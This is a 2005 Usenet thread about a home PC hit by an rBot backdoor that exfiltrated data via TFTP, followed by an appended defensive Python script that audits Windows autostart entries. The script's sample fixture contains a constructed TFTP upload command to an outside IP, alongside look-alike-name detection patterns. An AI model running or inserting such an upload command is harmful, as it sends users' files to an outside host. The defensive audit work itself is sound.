Re: Is complete home security possible?

From: Duane Arnold (notme_at_notme.com)
Date: 02/06/05


Date: Sun, 06 Feb 2005 09:50:38 GMT

joesamang@address.com (Joe Samangitak) wrote in
news:5e231d22.0502060005.67636755@posting.google.com:

> Joe <noone@no.com> wrote in message
> news:<20050205173357.762$Nt@news.newsreader.com>...
>> Joe Samangitak wrote:
>> > I recently got hit by a trojan (Kaspersky called it
>> > "Backdoor.Win32.rBot.Gen"). I saw this thing either take over my
>> > TFTP program (or install one of its own). It installed several
>> > programs on my HD to start up with Windows (XP Pro), like
>> > "IEXPLOREUP.EXE", and used them to transfer data out to the net,
>> > via TFTP. Exactly what it was transferring, I have no idea. I have
>> > since renamed Windows TFTP.EXE file, because I don't know why it is
>> > even there, if it can be exploited so easily by hackers. My
>> > security before this occurred was Kerio 2.1 as a firewall (always
>> > made sure I got 100% stealth ports on GRC's "ShieldsUp!" test),
>> > Kaspersky (always ensure my definitions are updated), and for good
>> > measure, GIANT AntiSpyware. I have TrojanGuard on the system, but
>> > only use it for scanning, to conserve resources.
>> >
>> > Despite all these measures, some mofo still managed to circumvent
>> > my security. I don't know how, but all I know is at one point, my
>> > firewall and virus program stopped loading with Windows. I don't
>> > know if the trojan somehow disabled them, but I know I didn't take
>> > them out of startup. I just wasn't so quick to put them back and
>> > next thing you know... There was a point where I saw Kerio crash
>> > before my eyes, and then it just took itself out of memory and was
>> > no longer active. Never saw it do that before, and again, I don't
>> > know if the trojan was responsible for this.
>> >
>> > Which leads me to my question: I have a hi-speed connection, and
>> > I'm thinking of leaving it on all the time (ease & convenience),
>> > rather than just starting it up whenever I do browsing. For this to
>> > happen, I would want to have bulletproof security to where I'm
>> > confident my firewall is not going to go south on me. I don't know
>> > yet whether SP2's Security Center will protect me from hackers
>> > trying to disable my firewall via trojans. What if I have a backup
>> > software firewall in place in case the first one gives out? Is it
>> > possible to achieve a level of software security to where a home
>> > user under XP Pro SP2 can be confident in leaving a hi-speed
>> > connection open without fear of hackers circumventing the security
>> > measures? In other words, WHAT AM I DOING WRONG HERE??!
>> >
>> > Thanks for your opinions.
>>
>>
>> Joe, I want to thank you for writing in here. Your story is kinda
>> heartfelt for me 'cause I am also interested in your question being
>> answered. I don't have any problems, but am curious to see people's
>> answers for you.
>
> I'm curious to see an answer that helps me out with advice that I
> don't already know.

You're not going to get that advice. There is nothing running on the
computer that's going to stop another program from doing something once
that program has reached the machine and has been executed by the user.
If you caused the execution of the malware program by clicking on
something, whether or not the click event caused the malware program to
drop its payload of other backdoor programs and they were executed, then
it's over, as you have seen.

If you're looking for that magic bullet, it's not there. A malware
program that drops a payload must be executed by the end user in some
kind of shape, form or fashion. It just doesn't happen without the
assistance of the end user.

The buck stops with you and it doesn't stop anywhere else.

Duane :)
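The symptoms Joe describes (a look-alike executable such as IEXPLOREUP.EXE added to startup, outbound TFTP transfers, and the firewall and antivirus silently dropped from startup) can be checked for by auditing the autostart entries. The script below is an added example, not code from anyone in this thread; the startup entries are constructed, the expected security-tool image names (firewall.exe, antivirus.exe) are placeholders to be replaced with the real ones, and the list of imitated system binaries is illustrative.

```python
"""Audit Windows autostart (Run-key style) entries for the symptoms in the
thread: look-alike binary names, TFTP use, and missing security software.
All sample data below is constructed for illustration."""
import difflib
import re

# Well-known binaries whose names malware commonly imitates (illustrative).
KNOWN_BINARIES = ("iexplore.exe", "explorer.exe", "svchost.exe", "lsass.exe")
# Security tools expected to start with Windows. Placeholder image names;
# substitute the real executable names of the installed firewall and AV.
EXPECTED_TOOLS = {"firewall.exe": "Kerio firewall", "antivirus.exe": "Kaspersky"}

SAMPLE_ENTRIES = [  # constructed (entry name, command line) pairs
    ("Kaspersky", r'"C:\Program Files\Kaspersky\antivirus.exe" /autorun'),
    ("IEXPLOREUP", r"C:\WINDOWS\System32\IEXPLOREUP.EXE"),
    ("Updater", r"C:\WINDOWS\System32\tftp.exe -i 198.51.100.7 put data.bin"),
]

def image_name(cmd):
    """Return the lower-cased executable file name from a command line,
    handling both quoted and unquoted paths."""
    m = re.match(r'"([^"]+)"|(\S+)', cmd.strip())
    if not m:
        return ""
    path = m.group(1) or m.group(2)
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def lookalike_of(name):
    """Return the known binary this file name imitates, or None.
    Catches appended suffixes (iexploreup) and near spellings (svch0st)."""
    n = name.lower()
    if n in KNOWN_BINARIES:
        return None
    stem = n[:-4] if n.endswith(".exe") else n
    for known in KNOWN_BINARIES:
        kstem = known[:-4]
        if stem.startswith(kstem) or \
                difflib.SequenceMatcher(None, stem, kstem).ratio() >= 0.8:
            return known
    return None

def audit(entries):
    """Return a list of human-readable findings for the given entries."""
    findings, present = [], set()
    for name, cmd in entries:
        image = image_name(cmd)
        present.add(image)
        target = lookalike_of(image)
        if target:
            findings.append(f"{name}: {image} imitates {target}")
        if "tftp" in cmd.lower():
            findings.append(f"{name}: command line invokes TFTP ({cmd})")
    for image, tool in EXPECTED_TOOLS.items():
        if image not in present:  # security software removed from startup
            findings.append(f"{tool} ({image}) is missing from startup")
    return findings

if __name__ == "__main__":
    for finding in audit(SAMPLE_ENTRIES):
        print(finding)
```

Run against the constructed entries it reports the imitated browser binary, the TFTP invocation, and the absent firewall; on a real machine the entries would come from the Run keys or a startup-folder listing.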